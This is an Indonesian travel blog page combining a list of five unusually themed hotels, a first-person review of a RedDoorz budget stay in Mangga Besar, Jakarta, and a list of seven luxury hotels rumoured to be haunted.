Sebagai salah satu destinasi wisata terbaik di dunia, Indonesia sudah sewajarnya memiliki berbagai hotel-hotel terbaik pula. Seperti contohnya yang paling gres adalah Nihi Sumba Island yang terletak di Sumbawa, Nusa Tenggara Timur, yang kali ini terpilih kembali sebagai hotel terbaik di dunia.

Tapi, selain menawarkan hotel terbaik kepada pengunjung domestik maupun mancanegara, ternyata di Indonesia ini banyak pula loh hotel-hotel dengan konsep dan desain yang super unik. Dikombinasikan dengan lokasinya yang strategis dan fasilitasnya yang memanjakan, keberadaan hotel-hotel ini menjadi daya tarik tersendiri bagi para traveller yang tak cuma mencari penginapan yang nyaman tapi juga tak terlupakan.

1. Hotel Pacific Palace – Batam

Eits, jangan dulu mengernyikan dahi. Kapal ini tidak seperti yang kamu kira. Ini adalah sebuah hotel yang kebetulan saja berbentuk seperti sebuah kapal pesiar. Hotel bernama Pacific Palace ini berada di kota Batam dan berpangkat bintang 5. Jumlah lantainya sendiri adalah 8 lantai dengan 180 kamar.

Ruang lobi, lounge room, hingga ruang meeting dirancang semirip mungkin layaknya sebuah kapal mewah. Soal fasilitas tak usah ditanya ya, lengkap banget. Jadi, tunggu apa lagi? Cuma di Pacific Palace aja kamu bisa merasakan sensasi menginap di sebuah kapal pesiar mewah tanpa harus takut terserang mabuk laut.

2. Rumah Pohon Leo – Bogor

Bosan sama penginapan modern berlapis beton yang berada di antara sesaknya gedung perkantoran? Cobain yuk sensasi bermalam di hutan rindang ala Tarzan di Rumah Pohon Leo yang merupakan bagian dari kompleks Taman Wisata Mekersari di Cileungsi, Bogor. Di hutan ini, kamu bisa merasakan pengalaman menginap di alam yang seutuhnya.

Karena tempatnya yang lega, bisa membuat 4-5 orang, serta konsep wahana edukasi sambil bermain yang ditawarkan, Rumah Pohon Leo seringkali dijadikan pilihan bagi keluarga yang membawa anak-anak. Kendati sarat dengan konsep yang lekat dengan alam, di dalamnya tetap terdapat fasilitas lengkap layaknya sebuah hotel seperti TV, kulkas mini, shower yang suhu airnya dapat diatur panas atau dingin, hingga obat nyamuk. Namanya juga di hutan, gak jarang kalo nyamuk banyak berkeliaran.

3. The Highland Park Resort – Bogor

Hotel yang letaknya berada di Kampung Sinarwangi ini juga sangat unik dan gak kalah keren. Setiap kamar dirancang layaknya perkemahan persis seperti tenda-tenda bangsa Mongol yang terkenal gahar itu. Ada dua jenis tenda utama yang bisa kamu pilih, tipe Mongolian dan tipe Apache. Untuk paket keluarga besar, ada pula kamar tipe Barak yang bisa menampung hingga 30 orang.

Tempat ini cocok banget buat yang pengen kumpul keluarga atau reuni sama temen-temen sekolah dulu karena wahana yang ditawarkan gak setengah-setengah. Ada kolam renang ala waterpark, paintball, tempat menunggang kuda, dan tentunya kegiatan outbond macam flying fox. Jadi, kalau keluarga atau perusahaan kamu kebetulan lagi nyari tempat liburan, bisa kamu rekomendasiin ke sini.

4. Hotel pohon inn – Malang

Hotel unik selanjutnya adalah Pohon Inn yang berada di kota Malang atau tepatnya berada di kawasan Jatim Park 2. Eksterior bangunannya sedikit mengingatkan kita pada desain rumah-rumah zaman batu ala kartun Flinstone. Hotel ini juga dipenuhi dengan berbagai satwa liar. Makin berasa deh suasana hutan di pusat kota.

Hotel ini sangat direkomendasikan buat kamu yang kepengen jalan-jalan bawa anak sambil berkunjung ke tempat wisata alam di sekitarnya seperti Kebun Binatang Batu Secret dan Museum Satwa. Ada juga fasilitas paling unik yang sering dibicarain dari tempat ini, yakni Jungle FastFood. Jadi para tamu dapat menyantap hidangan mereka sembari dalam sebuah resto yang berputar mengelilingi satwa-satwa liar.

5. Mara River Safari – Gianyar, Bali

Kayaknya ada yang kurang ya kalau bahas hotel unik tapi gak nyantumin hotel yang ada di Bali. Destinasi nomor satu turis mancanegara ke Indonesia ini tercatat punya banyak sekali hotel-hotel unik. Dan yang paling unik menurut kami adalah Mara River Safari Lodge.

Keunikan konsep Sanggraloka ini memang sungguh ekstrem. Tempat ini menyatukan sebuah penginapan beserta habitat satwa ala-ala benua Afrika gitu. Hewan-hewan eksotis seperti zebra, kuda nil, hingga harimau bisa dengan mudah kamu temukan di berbagai spot yang ada di kawasan penginapan ini. Di mana lagi coba kita bisa bangun tidur, berdiri di balkon, liatin panorama indah, sambil ngasih makan hewan-hewan liar kayak di Mara River Safari ini?

Tips Seputar RedDoorz, Hotel Mewah Harga Murah

RedDoorz, great budget at great prices

Siapa di sini yang merasa dirinya seorang backpacker atau budget traveler? Sukanya nginep di dormitory hostel, guesthouse, atau hotel-hotel murah? Makin hari, penginapan murah makin banyak sih. Tapi, penginapan murah dengan fasilitas yang nyaman dan lokasi strategis, kadang masih susah ditemuin! Ada yang murah banget, tapi kamarnya nggak enak, banyak dapet review jelek dari orang-orang. Ada juga yang murah dan enak, tapi lokasinya ada di ujung peradaban manusia. Mungkin didorong oleh kondisi itulah, RedDoorz hadir di Indonesia!

 

Sekilas RedDoorz

Melihat nama dan logonya yang berwarna putih-merah, RedDoorz membawaku kepada asumsi awal bahwa jaringan hotel budget ini adalah metamorfosis dari sebuah jaringan hotel budget yang sudah ada sebelumnya. Ternyata tidak sama sekali, kokoh cici! RedDoorz adalah jaringan hotel murah asli dari Indonesia yang benar-benar baru, dari putra bangsa kita sendiri.

RedDoorz, comfortable rooms at great prices — begitu bunyi slogannya. RedDoorz merupakan jaringan akomodasi budget di Indonesia dengan standar pelayanan berkelas. Berdiri semenjak Juli 2015, RedDoorz sudah berhasil merambah 3 kota besar di Indonesia (Bali, Jakarta, Bandung) dengan 100++ properti yang tersebar.

Toiletries RedDoorz

Toiletries RedDoorz

Menjamin standar pelayanan RedDoorz Service Assurance, setiap kamar di RedDoorz dilengkapi dengan:

  • Akses wifi gratis
  • Televisi kabel
  • Linen (sprei) bersih
  • Kamar mandi higienis
  • Air mineral gratis
  • Peralatan mandi premium khas RedDoorz (sabun, shampoo, moisturizer)

Hotel-hotel RedDoorz langsung memenuhi halaman pertama kalau kamu search harga hotel termurah di Booking.com. Hal ini membuatku bertanya-tanya, “Apakah RedDoorz membangun gedung baru atau menggunakan gedung lama?” Kepala bagian Digital Marketing-nya sendiri, Mr. Puneet Singhal menjawab, RedDoorz menggunakan gedung-gedung properti lama yang kemudian di-rebrand menjadi RedDoorz. Ah, pantes sudah banyak ya..

 

Pencarian Lokasi dan Check-In

Nah, aku sendiri baru saja menginap satu malam di salah satu Hotel RedDoorz pada pekan Imlek lalu, tepatnya di Jl. Mangga Besar V no 1B, Jakarta. Dari posisi awal di kawasan UOB Plaza, aku naik Commuter Line dari Stasiun Sudirman dan turun di Stasiun Jakarta Kota.

RedDoorz Mangga Besar is easily accessible from Jakarta Kota Station

Aku sempat bolak-balik kebingungan mencari RedDoorz ini karena lokasi riil yang tak sesuai dengan Google Maps, serta warga lokal yang juga tak mengetahui keberadaan tempat ini. Di dalam peta, RedDoorz berada di mulut anak jalan. Namun kenyataannya, aku masih harus berjalan sekitar 100-200 meter ke dalam untuk dapat menemukan tempat yang dicari ini. Agak heran sih, nomor 1B memang seharusnya berada di mulut anak jalan. Pun tidak ada papan besar menonjol, hanya sebuah papan kecil di depan pos satpam.

Aku mengemukakan maksud kedatanganku kepada bapak satpam. Dia lalu memanggil seseorang dari dalam gedung, dibalas dengan longokan dari atap gedung dan permintaan untuk aku menunggu sebentar di depan. Pintu dibuka, aku pun masuk ke dalam disambut oleh seorang cici-cici dengan pakaian sehari-hari. Tanpa angpao. Tanpa kue keranjang.

Receptionist room, RedDoorz Mangga Besar

Aku dipersilakan duduk pada salah satu kursi di sebuah ruang depan minimalis, berisi empat buah kursi dan dua buah meja bundar yang ringkas. Aku duduk mengisi lembar data diri yang diberikan, sementara si empunya properti sibuk mengoperasikan sebuah aplikasi dari smartphone. Dugaanku, dia sedang mengkonfirmasi kedatanganku pada aplikasi RedDoorz, mirip seperti yang dilakukan sopir ojek online.

Aku memberikan deposit senilai Rp 300.000,00 sesuai dengan peraturan yang ada saat menginap bersama RedDoorz. Deposit akan dikembalikan saat check-out maksimal jam 12.00, sementara waktu check-in adalah pukul 14.00, tipikal hotel-hotel budget. Seorang bapak paruh baya lalu membawaku masuk ke dalam sayap gedung sebelah kiri yang dipisahkan oleh sebuah toko Indomaret dengan gedung sayap kanan ini. Kayak aku dan kamu gitu deh, dipisahkan oleh jarak dan calon mertua.

 

Fasilitas Hotel dan Kamar

Pintu gedung terbuka setelah penghuni menempelkan smart card pada penampang metal di kenop pintu. Kamarku ada di lantai 2 yang dapat diakses dengan tangga, tepat di ujung lorong. Pintu kamarnya sendiri dapat dibuka dan ditutup secara konvensional menggunakan anak kunci yang dimasukkan ke dalam lubang kunci.

Spreinya rapi, bersih, wangiii

Spreinya rapi, bersih, wangiii

Kamar diisi dengan ranjang berkapasitas 2 orang yang bersih, nyaman, dan wangiii. Fasilitas lainnya adalah AC, meja kecil di samping ranjang, TV layar datar, meja-kursi kerja, cermin, 2 botol air mineral, colokan listrik di beberapa titik, WIFI, lemari, dan penyimpanan sepatu.

Untuk toiletries, RedDoorz menyediakan body wash, shampoo, moisturizer, dan sepasang handuk. Tak ada tissue dan sandal, aku berangkat dari Bandung dengan asumsi bahwa kedua item itu sudah disediakan di RedDoorz. Untungnya di bawah ada Indomaret, jadi bisa mampir beli keperluan sehari-hari.

Interior dan fasilitas RedDoorz Mangga Besar, Jakarta

Kamarnya sendiri bersih, nyaman, dan wangi, enak buat liburan sambil kerja atau main laptop. AC berfungsi dengan baik, menyemburkan udara sejuk ke setiap sudut ruangan. TV juga menyajikan tayangan saluran televisi kabel dan nasional yang jernih, nggak bakal bosen di kamar deh! Lemarinya besar, memiliki banyak ruang untuk menyimpan barang bawaan seperti ransel utama, tas kecil, baju-baju kotor, dan alas kaki.

Dari sini, aku memahami bahwa konsep RedDoorz ini sedikit unik dari konsep hotel-hotel yang lain. RedDoorz lebih mirip seperti AirBnB, menginap di warga lokal seperti Couchsurfing namun berbayar karena kamar dikelola professional. Bedanya, di sini ada kesamaan brand dan standardisasi akomodasi yang berupa 6 hal di atas. Jadi, setiap pemilik properti dapat mendaftarkan propertinya menjadi Hotel RedDoorz. Makanya, RedDoorz lebih memilih kata “akomodasi” untuk mendeskripsikan dirinya, bukan “hotel”.

Shower RedDoorz Mangga Besar, Jakarta

Nah, maka mungkin saja ada beberapa hal yang berbeda dari Hotel RedDoorz yang satu dengan yang lainnya. Ada RedDoorz yang menempati hotel, guesthouse, apartemen, atau kost premium seperti RedDoorz Mangga Besar ini. Eh, kalau kamu punya juga punya pengalaman menginap di RedDoorz, boleh ya share ceritanya.

 

Proses Check-Out dan Kesimpulan

Proses check-out dilayani oleh cici-cici yang kemarin juga menerima kedatanganku. Setelah kondisi kamar dipastikan oke, aku menerima kembali uang Rp 300.000,00 yang semula dititipkan sebagai deposit.

Cable TV - RedDoorz Mangga Besar, Jakarta

Dari segi harga, RedDoorz oke banget! Dengan harga yang sama untuk hotel di Jakarta saat akhir pekan panjang, paling-paling cuma dapet hotel esek-esek di kawasan Mangga Besar, hihihi. Ada yang sama murahnya, tapi lokasi jauh dari pusat kota dan konsentrasi titik wisata Jakarta. Saat itu, rate-nya adalah Rp 200.000 – Rp 250.000, namun akan lebih murah saat memasuki hari biasa.

Waktu check-in dan check-out persis seperti hotel budget yang lain, jadi nggak masalah. Lokasinya strategis banget! Hanya berjarak sekitar 1.5 kilometer dari Stasiun Jakarta Kota, dapat dicapai dengan TransJakarta dan turun di halte Mangga Besar lalu dilanjutkan dengan sedikit berjalan kaki. Ada juga jalur angkot yang lewat persis di depan hotel, tapi maaf aku nggak hafal angkot jurusan apa, hihihi. Kebersihan dan kenyamanan juga oke banget, aku suka wangi spreinya…

A kitchen at the corner

Pemesanan kamar dapat dilakukan melalui web-web reservasi hotel, tapi lebih baik melalui web RedDoorz langsung di www.reddoorz.com atau di mobile site m.reddoorz.com, siapa tahu pas ada promo! Di web reservasi hotel, selain pembayaran melalui kartu kredit dan ATM seperti yang sudah jamak di hotel serupa, bisa juga dilakukan di minimarket. Makin mudah sesuai situasi kita deh!

Hotel yang Dikenal Angker, Padahal Mewah Banget di Indonesia

Biasanya saat memilih hotel untuk menginap, kenyamanan menjadi pertimbangan paling penting setelah harganya. Kenyamanan bisa dilihat dari beberapa hal, mulai dari kualitas pelayanan, kelengkapan fasilitas, hingga minimnya gangguan ekternal seperti kebisingan.

Hotel di bawah ini dikenal angker dan sarat dengan  kejadian mistis, meski pun termasuk hotel berbintang dengan kualitas terbaik.

1. Hotel Indonesia, Jakarta

7 Hotel di Indonesia yang Dikenal Angker, Padahal Mewah Banget

Hotel mewah di ibu kota juga tak luput dari kisah mistis, salah satunya adalah Hotel Indonesia. Menurut kabar yang beredar, lantai 4 hotel ini menjadi pusat tinggal para penghuni tak kasat mata. Pengunjung mengaku kerap melihat sosok wanita cantik dengan gaun berwarna putih muncul di lorong depan lift.

Meski menyimpan kisah mistis, tetapi Hotel Indonesia tak pernah sepi pengunjung. Letaknya yang strategis yakni di kawasan Bundaran HI menjadi alasan utama hotel ini selalu menjadi favorit. Apalagi sarat sejarah dan fasilitasnya yang luar biasa wah.

2. Grand Aquila Hotel, Bandung

7 Hotel di Indonesia yang Dikenal Angker, Padahal Mewah Banget

Hotel mewah di Bandung, Jawa Barat, ini juga terkenal dengan cerita seramnya. Sejumlah tamu yang pernah menginap di sini mengatakan pernah “digoda” makhluk halus. Mulai dari suara ketukan pintu tengah malam, suara aneh di jendela, hingga kran air yang tiba-tiba terbuka. Tak jarang mereka menampakkan wujud saat pengunjung melewati lorong lobi hotel menuju kamar.

3. Hotel Niagara, Malang, Jawa Timur

7 Hotel di Indonesia yang Dikenal Angker, Padahal Mewah Banget

Hotel Niagara seolah menjadi ikon hotel angker di Kota Malang, bahkan Jawa Timur. Bangunan hotel  yang berdiri sejak 1918 ini masih memiliki interior bergaya lawas yang sangat kental.

Sudah banyak kisah misteri yang beredar dari pengalaman para pengunjung yang menginap di sana. Mulai dari penampakan hantu noni Belanda di koridor, suara wanita tertawa di kamar mandi, pintu lift tua yang tiba-tiba terbuka padahal sudah tak lagi beroperasi, dan lain sebagainya.

4. Hotel Inna Samudera, Sukabumi

7 Hotel di Indonesia yang Dikenal Angker, Padahal Mewah Banget

Cerita mistis tentang kamar 308 di Hotel Inna Samudera mungkin sudah familiar terdengar di telinga kita. Kamar tersebut khusus disiapkan sebagai tempat peristirahatan Nyai Roro Kidul, sehingga tak dibuka untuk umum.

Interior kamar terlihat didominasi warna hijau yang dipercaya sebagai warna kesukaan Nyai Roro Kidul. Mulai dari wallpaper, tempat tidur, termasuk hiasan dan ornamen kamar pun berwarna hijau. Di tengahnya terdapat lukisan berukuran raksasa sosok Nyai Roro Kidul.

5. Hotel Axana, Padang

7 Hotel di Indonesia yang Dikenal Angker, Padahal Mewah Banget

Dulunya, Hotel Axana bernama Hotel Ambacang sebelum diterpa gempa berkekuatan 7,3 SR pada 2009. Gempa dahsyat tersebut meruntuhkan hampir seluruh bagian gedung dan memakan banyak korban jiwa. Hotel yang terletak di jantung Kota Padang ini telah kembali dibangun sebagai Hotel Axana. Namun, kisah mistis akibat kejadian tersebut masih menyelimuti.

Konon, banyak pengendara dan juga tukang ojek yang melihat hantu dengan badan hancur mau pun mendengar jeritan minta tolong. Sebagian percaya bahwa hal ini disebabkan oleh arwah dari korban gempa 2009 lalu.

6. Grand Kanaya Hotel, Medan

7 Hotel di Indonesia yang Dikenal Angker, Padahal Mewah Banget

Hotel yang bertempat di Jalan Darussalam, Kota Medan ini pernah geger akibat kejadian bunuh diri pada 2015 lalu. Seorang mantan model diketahui lompat dari lantai enam, tepatnya kamar nomor 603.  Setelah kejadian itu, kamar tersebut dan beberapa kamar di sebelahnya ditutup untuk kalangan umum, karena dianggap penuh dengan energi negatif.

7. Hotel Majapahit

7 Hotel di Indonesia yang Dikenal Angker, Padahal Mewah Banget

Dulunya bernama Hotel Yamato. Hotel bergaya vintage ini merupakan salah satu tempat bersejarah, karena di sinilah arek-arek  Surabaya berusaha memperjuangkan kemerdekaan. Mereka merobek bendera Belanda hingga menjadi bendera merah putih dan mengibarkannya di puncak hotel.

Sampai sekarang, eksistensinya masih sangat hits. Bahkan, sebagian besar tamunya merupakan ekspatriat. Selain sarat akan cerita sejarah, hotel yang berubah nama menjadi Hotel Majapahit itu juga dipenuhi cerita mistis. Di antaranya penampakan wanita dengan gaun khas bangsawan Belanda, hingga suara tangisan tersedu-sedu di tengah malam.